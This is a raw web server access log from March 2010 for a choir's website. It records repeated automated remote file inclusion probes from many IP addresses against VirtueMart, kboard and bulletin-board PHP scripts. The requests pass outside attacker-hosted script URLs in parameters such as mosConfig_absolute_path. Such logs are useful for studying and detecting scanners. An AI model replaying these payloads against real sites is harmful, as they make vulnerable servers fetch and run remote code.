201.9.136.207 - - [09/Mar/2010:09:46:53 -0800] "GET /logs/access.logftp://vidal0ka.hd1.com.br:hehehe@ftp.hd1.com.br/pbot.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:09:47:00 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:47:19 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:48:02 -0800] "GET /logs/access_091229.log///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:48:06 -0800] "GET /logs/access_091229.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:49:55 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:49:55 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:49:55 -0800] "GET /logs/access_100213.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:50:00 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:50:00 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:50:00 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:50:01 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:50:24 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:50:31 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:50:37 -0800] "GET /logs/access_100212.log/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:50:37 -0800] "GET /?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:50:37 -0800] "GET /logs/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:50:41 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:50:55 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:51:07 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:51:08 -0800] "GET //bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:51:08 -0800] "GET /logs/access_100209.log%20%20///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:51:08 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:51:13 -0800] "GET /logs/access_100131.log%20%20///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:52:11 -0800] "GET /logs/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:52:12 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:52:12 -0800] "GET /index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:52:12 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:52:25 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:52:25 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:52:25 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:52:25 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:52:25 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:52:25 -0800] "GET /logs/access_100213.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:52:30 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:52:49 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:53:11 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:12 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:12 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:12 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:12 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:13 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:15 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:15 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:09:53:15 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:53:25 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:53:26 -0800] "GET /logs/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:53:26 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:53:26 -0800] "GET /index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:53:32 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:54:04 -0800] "GET /logs/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:54:21 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:54:21 -0800] "GET /logs/access_100213.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:54:21 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:54:29 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:54:29 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:54:29 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:54:53 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:54:55 -0800] "GET /logs/access_100117.log/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:55:00 -0800] "GET /logs/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:55:00 -0800] "GET /index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:55:00 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:09:55:02 -0800] "GET /logs/access_100116.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:55:14 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:55:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:55:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:55:19 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:55:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:55:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:55:42 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:55:47 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:55:47 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:55:48 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:56:06 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:09:56:12 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:56:46 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:56:46 -0800] "GET /logs/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:56:46 -0800] "GET /index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:57:54 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:57:54 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:57:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:57:54 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:57:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:57:54 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:07 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:16 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:26 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:27 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:31 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.208.135.7 - - [09/Mar/2010:09:58:31 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
213.208.135.7 - - [09/Mar/2010:09:58:33 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:39 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:41 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:47 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:58:55 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
